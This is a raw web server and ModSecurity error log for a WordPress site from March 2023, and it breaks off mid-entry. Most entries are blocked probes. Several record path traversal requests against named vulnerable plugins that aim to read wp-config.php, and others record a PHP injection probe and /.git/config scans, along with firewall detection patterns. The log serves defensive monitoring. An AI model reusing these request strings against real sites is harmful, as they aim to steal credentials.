"(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=./../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZA3MD3pKQvzaPITyJaClWAAAANI"], referer: https://www.google.com/search? [Sun Mar 12 08:48:22.359674 2023] [:error] [pid 8441:tid 140581636359936] [client 5.188.62.26:59916] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZA3YJnpKQvzaPITyJaCnTAAAAM0"] 2023/03/12 12:45:53 [error] 8224#8224: *149506 access forbidden by rule, client: 3.94.190.11, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sun Mar 12 17:42:23.693913 2023] [autoindex:error] [pid 8294:tid 140581703501568] [client 20.7.133.62:54716] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Mar 13 03:37:23.210478 2023] [ssl:warn] [pid 10859:tid 140660457305984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 13 03:37:23.328482 2023] [ssl:warn] [pid 10860:tid 140660457305984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 13 03:37:23.547123 2023] [ssl:warn] [pid 10860:tid 140660457305984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 13 03:37:25.168178 2023] [ssl:warn] [pid 10860:tid 140660457305984] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 13 03:37:27.550996 2023] [ssl:warn] [pid 11314:tid 139723407882112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 13 03:37:27.677328 2023] [ssl:warn] [pid 11315:tid 139723407882112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Mar 13 09:44:47.368288 2023] [:error] [pid 11337:tid 139723104302848] [client 5.188.62.76:42262] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZA823x3UCAappbdkq6EggQAAAIY"] [Mon Mar 13 11:38:19.967049 2023] [:error] [pid 11337:tid 139723129480960] [client 5.188.62.174:47524] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZA9Rex3UCAappbdkq6EidwAAAIM"] [Mon Mar 13 16:12:19.465484 2023] [autoindex:error] [pid 12632:tid 139723028768512] [client 193.202.110.28:59120] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/navigation/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/navigation/index.php [Mon Mar 13 16:34:04.397301 2023] [:error] [pid 11337:tid 139723011983104] [client 5.188.62.174:33948] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZA-WzB3UCAappbdkq6EmHwAAAJE"] [Mon Mar 13 19:03:35.084608 2023] [ssl:warn] [pid 11315:tid 139723407882112] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 03:21:17.012520 2023] [ssl:warn] [pid 28112:tid 140596023687040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 03:21:17.142633 2023] [ssl:warn] [pid 28113:tid 140596023687040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 03:21:17.620527 2023] [ssl:warn] [pid 28113:tid 140596023687040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 03:21:19.773453 2023] [ssl:warn] [pid 28113:tid 140596023687040] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 03:21:22.126748 2023] [ssl:warn] [pid 28558:tid 140016525199232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 03:21:22.235989 2023] [ssl:warn] [pid 28559:tid 140016525199232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 04:12:52.478807 2023] [:error] [pid 28581:tid 140016143501056] [client 5.188.62.174:42424] [client 5.188.62.174] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBA6lBBdlhm4uJLnZnXq9gAAAA8"] [Tue Mar 14 04:14:32.878452 2023] [:error] [pid 28582:tid 140016084752128] [client 36.70.5.108:42514] [client 36.70.5.108] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBA6-CwDlNKDfMWcar4N8AAAAFY"] [Tue Mar 14 07:38:46.865406 2023] [autoindex:error] [pid 28583:tid 140016126715648] [client 43.130.147.61:52718] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Tue Mar 14 14:24:48.853432 2023] [autoindex:error] [pid 28827:tid 140016143501056] [client 31.22.4.254:49786] AH01276: Cannot serve directory /home/investig/public_html/wp-content/themes/twentynineteen/classes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/themes/twentynineteen/classes/index.php [Tue Mar 14 17:53:11.514544 2023] [:error] [pid 28827:tid 140016260998912] [client 5.188.62.26:58266] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBD61w2Kl7fRoQjNIB5khwAAAME"] [Tue Mar 14 17:53:11.515442 2023] [:error] [pid 28581:tid 140016193857280] [client 5.188.62.26:58268] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBD61xBdlhm4uJLnZnXxLQAAAAk"] [Tue Mar 14 17:53:15.529320 2023] [:error] [pid 4324:tid 140016210642688] [client 5.188.62.26:58270] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBD62yFdg5P5oLuPfWmMKgAAAQc"] [Tue Mar 14 17:53:19.898864 2023] [:error] [pid 28581:tid 140016151893760] [client 217.11.184.26:58274] [client 217.11.184.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBD63xBdlhm4uJLnZnXxLgAAAA4"] [Tue Mar 14 17:54:07.593825 2023] [:error] [pid 4324:tid 140016168679168] [client 190.149.186.29:58292] [client 190.149.186.29] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBD7DyFdg5P5oLuPfWmMMQAAAQw"] [Tue Mar 14 17:55:28.064751 2023] [:error] [pid 4324:tid 140016260998912] [client 148.63.11.208:58352] [client 148.63.11.208] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBD7YCFdg5P5oLuPfWmMOwAAAQE"] [Tue Mar 14 19:03:18.874549 2023] [ssl:warn] [pid 28559:tid 140016525199232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Mar 14 20:38:10.303865 2023] [:error] [pid 15232:tid 140016076359424] [client 5.188.62.26:36922] [client 5.188.62.26] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBEhglbYJqz2BvNTaOC18AAAAVc"] [Wed Mar 15 03:18:20.602710 2023] [ssl:warn] [pid 14409:tid 139885106149248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 15 03:18:20.719346 2023] [ssl:warn] [pid 14410:tid 139885106149248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 15 03:18:21.053814 2023] [ssl:warn] [pid 14410:tid 139885106149248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 15 03:18:22.583793 2023] [ssl:warn] [pid 14410:tid 139885106149248] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 15 03:18:26.244809 2023] [ssl:warn] [pid 14855:tid 140038731028352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 15 03:18:26.376795 2023] [ssl:warn] [pid 14856:tid 140038731028352] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Mar 15 04:31:42.175732 2023] [:error] [pid 15315:tid 140038406891264] [client 51.255.196.88:56866] [client 51.255.196.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZBGQfqAJZhzAZ_4cSj7kbwAAAMk"] [Wed Mar 15 13:06:51.853617 2023] [:error] [pid 15315:tid 140038390105856] [client 5.188.62.76:54272] [client 5.188.62.76] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/octet-stream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "ZBIJO6AJZhzAZ_4cSj71DQAAAMs"] [Wed Mar 15 14:20:51.320539 2023] [:error] [pid 14881:tid 140038339749632] [client 20.2.81.198:57298] [client 20.2.81.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=./../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/usc-e-shop/functions/content-log.php"] [unique_id "ZBIak727BJp43jIJ7siingAAABE"] [Wed Mar 15 14:37:47.627893 2023] [:error] [pid 15315:tid 140038457247488] [client 212.30.36.209:58050] [client 212.30.36.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-filemanager/incl/libfile.php"] [unique_id "ZBIei6AJZhzAZ_4cSj73UgAAAMM"] [Wed Mar 15 14:37:47.739341 2023] [:error] [pid 15315:tid 140038432069376] [client 212.30.36.209:58052] [client 212.30.36.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text%2Fhtml&mla_download_file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php"] [unique_id "ZBIei6AJZhzAZ_4cSj73UwAAAMY"] [Wed Mar 15 14:37:47.843973 2023] [:error] [pid 15315:tid 140038448854784] [client 212.30.36.209:58054] [client 212.30.36.209] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-admin/admin-ajax.php?action=handle_downloads&alg_wc_pif_download_file=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZBIei6AJZhzAZ_4cSj73VAAAAMQ"] [Wed Mar 15 18:23:37.770029 2023] [:error] [pid 15315:tid 140038364927744] [client 20.2.81.198:38956] [client 20.2.81.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZBJTeaAJZhzAZ_4cSj79BAAAAM4"] [Wed Mar 15 18:30:46.869957 2023] [:error] [pid 14883:tid 140038348142336] [client 20.2.81.198:39244] [client 20.2.81.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=../../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZBJVJpKxLzXHW3nhk4-B0gAAAJA"] [Wed Mar 15 18:38:18.056556 2023] [:error] [pid 15315:tid 140038457247488] [client 20.2.81.198:39510] [client 20.2.81.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri 